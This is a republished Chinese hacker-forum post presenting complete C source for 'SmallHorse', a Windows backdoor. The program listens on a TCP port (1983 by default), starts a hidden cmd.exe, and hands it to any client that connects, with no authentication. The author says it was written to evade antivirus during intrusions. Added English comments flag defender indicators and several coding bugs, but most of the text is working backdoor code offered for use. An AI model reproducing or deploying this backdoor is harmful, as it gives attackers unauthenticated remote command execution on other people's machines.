文章作者: 小马/SmallHorse [E.S.T VIP](这个E.S.T VIP写不写是无所谓的) 信息来源: 邪恶八进制 中国 最近闲着无聊,自己琢磨着写了个简单的CMDSHELL后门。同时也避免了入侵时被杀毒软件K了。参考了T-CMD源代码和以前黑防的相关文章。从中学到了很多知识。 程序很简单,运行后默认打开1983端口,也可以自己设定端口,等待客户端来连接。连接可以使用nc。本来还想设计成服务让其开机后自动运行,由于时间问题等以后完善了。 用法:smallhorse [-p port] -p参数用于设置自己的端口 下面是源程序,贴出来和大家共同学习进步,同时希望高手不吝指教,小马在此谢了先。 QQ:11189658 E-MAIL: 在vc++6.0 WIN2003下编译通过
/*
 * Reviewer notes (code reproduced as posted, including the "#i nclude"
 * forum mangling of the include directives).
 *
 * What the listing is: a TCP bind shell.  OpenDoor() listens on every
 * interface and, for each accepted connection, ClientThread() launches a
 * hidden cmd.exe whose stdin/stdout/stderr are bridged to that socket.
 * Nothing between accept() and the shell checks who connected.
 *
 * Facts useful to a defender, all visible below: the default listener
 * port is 1983; a fixed banner string is sent to every client right after
 * connect; the child is <system dir>\cmd.exe started with SW_HIDE and
 * STARTF_USESTDHANDLES, with this process as its parent and inheritable
 * pipe handles as its standard handles.
 */
#i nclude<winsock2.h>
#i nclude <stdio.h>
#pragma comment (lib, "Ws2_32.lib")
/* TCP port to listen on; main() overrides it from "-p <port>". */
int port=1983;
/* One thread per accepted client; defined below. */
DWORD WINAPI ClientThread(LPVOID lpParam);
/* Print the banner and usage text to the local console. */
void Help()
{printf(" /***************************************\\\n");
printf(" |This SmallHorse's First CMDSHELL V0.1 |\n");
printf(" |Thanks For Using It! |\n");
printf(" |SmallHorse [E.S.T] VIP 2005.03 |\n");
printf(" |***************************************|\n");
printf(" |usage:smallhorse [-p port] |\n");
printf(" | port: Port Number To Listen On |\n");
printf(" | Default Port Is 1983 |\n");
printf(" \\***************************************/\n");
return; }
/*
 * Listener: WSAStartup, socket, bind to INADDR_ANY:port, listen, then an
 * endless accept loop that hands each client to ClientThread().
 * Every early "return" leaves the socket open and Winsock initialized;
 * the WSACleanup() after the while(1) loop is unreachable.
 */
void OpenDoor()
{
// Initialize Winsock.
WSADATA wsaData;
SOCKET m_socket,AcceptClient;
sockaddr_in Service,Client;
int ClientSize,i=0;   // i is never used
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR ) return;
// Create a socket.
m_socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
// Note: socket() reports failure with INVALID_SOCKET, not SOCKET_ERROR,
// so this test does not catch a failed socket() call.
if(m_socket==SOCKET_ERROR) return;
Service.sin_family = AF_INET;
Service.sin_addr.s_addr = htonl(INADDR_ANY);   // all local interfaces
Service.sin_port = htons( port );
if(bind( m_socket, (SOCKADDR*)&Service, sizeof(Service) )==SOCKET_ERROR) return;// bind
if (listen(m_socket,5)==SOCKET_ERROR) return;// backlog of 5
printf("\nsmallhorse Listen On Port: %d... ^*^\n",port);
ClientSize=sizeof(Client);
while(1)
{
// accept() also reports failure with INVALID_SOCKET (see socket() note).
AcceptClient=accept(m_socket,(SOCKADDR*)&Client,&ClientSize);
if(AcceptClient==SOCKET_ERROR) return;// accept a connection
printf( "Client Connected.\n");
// Fixed greeting sent to every client before the shell starts; a stable
// on-the-wire signature of this program.
char *sendbuf = "/***************************************\\\n\tThanks For Using...\n\tSmallHorse's CmdShell!\n\tGood Luck!\n\\***************************************/\n\n";
send( AcceptClient, sendbuf, strlen(sendbuf), 0 );
// The thread receives the ADDRESS of the local AcceptClient, which the
// next accept() overwrites; the Sleep(1000) below is the only thing
// giving the thread time to copy it.  The thread handle is never closed.
if(CreateThread(NULL,0,ClientThread,(LPVOID)&AcceptClient,0,NULL)==NULL) printf("Create Thread Error!\n");
Sleep(1000);
}
WSACleanup();   // unreachable: the loop above only exits via return
return;
}
/*
 * Per-client thread.  lpParam points at OpenDoor()'s AcceptClient socket.
 * Creates two anonymous pipes, starts a hidden cmd.exe with its standard
 * handles attached to them, then shuttles bytes between the socket and
 * the pipes until either side fails.  No handle created here (pipes,
 * process, thread, socket) is ever closed.
 */
DWORD WINAPI ClientThread(LPVOID lpParam)
{int ret;
char Buf[1024];
HANDLE Rpipe,Wpipe,Wfile,Rfile;
SOCKET AcceptClient=(SOCKET)*(SOCKET*)lpParam;   // copy before OpenDoor() reuses it
SECURITY_ATTRIBUTES sa;
sa.nLength=sizeof(sa);
sa.bInheritHandle=TRUE;   // the child must be able to inherit the pipe ends
sa.lpSecurityDescriptor=NULL;
// Return values stored in ret but never checked.
ret=CreatePipe(&Rpipe,&Rfile,&sa,0);
ret=CreatePipe(&Wfile,&Wpipe,&sa,0);
// Two pipes: one carries commands in (Wpipe -> Wfile = child stdin),
// the other carries results out (Rfile = child stdout/stderr -> Rpipe).
STARTUPINFO startinfo;
GetStartupInfo(&startinfo);
startinfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
startinfo.hStdInput=Wfile;
startinfo.hStdError=startinfo.hStdOutput=Rfile;
startinfo.wShowWindow=SW_HIDE;   // no visible console window for the child
char cmdline[MAX_PATH];
// Full path "<system dir>\cmd.exe"; return value of GetSystemDirectory
// is not checked before the unbounded strcat.
GetSystemDirectory(cmdline,MAX_PATH);
strcat(cmdline,("\\cmd.exe"));
PROCESS_INFORMATION proinfo;
// bInheritHandles=1 so the child gets the pipe ends; success is not
// checked and proinfo's process/thread handles are never closed.
ret=CreateProcess(cmdline,NULL,NULL,NULL,1,0,NULL,NULL,&startinfo,&proinfo);
// Unsigned: recv()'s int result is stored here too, so a negative error
// return becomes a large positive count and the "<=0" test below only
// fires on 0 (orderly close).
unsigned long ByteRec;
// Poll loop: forward pending child output to the socket; otherwise block
// on recv() and feed whatever arrives to the child's stdin.
while(1)
{
Sleep(100);   // 100 ms between pipe checks
// Non-destructive check for pending output; return value not checked.
PeekNamedPipe(Rpipe,Buf,1024,&ByteRec,0,0);
if(ByteRec){
ret=ReadFile(Rpipe,Buf,ByteRec,&ByteRec,0);
if(!ret) break;
ret=send(AcceptClient,Buf,ByteRec,0);
if(ret<=0) break;
}
else{
ByteRec=recv(AcceptClient,Buf,1024,0);
if(ByteRec<=0) break;
ret=WriteFile(Wpipe,Buf,ByteRec,&ByteRec,0);
if(!ret) break;
}
}
return 0;
}
/*
 * Entry point: print the banner, optionally take "-p <port>" (parsed with
 * atoi, no range check), then run the listener, which never returns
 * normally.
 */
int main(int argc, char *argv[])
{
Help();
if(argc==3)
if(!strcmp(argv[1],"-p")) port=atoi(argv[2]);
OpenDoor();
return 0;
}
本文转自 loveme23 的 51CTO 博客,原文链接:http://blog.51cto.com/loveme23/7951 ,如需转载请自行联系原作者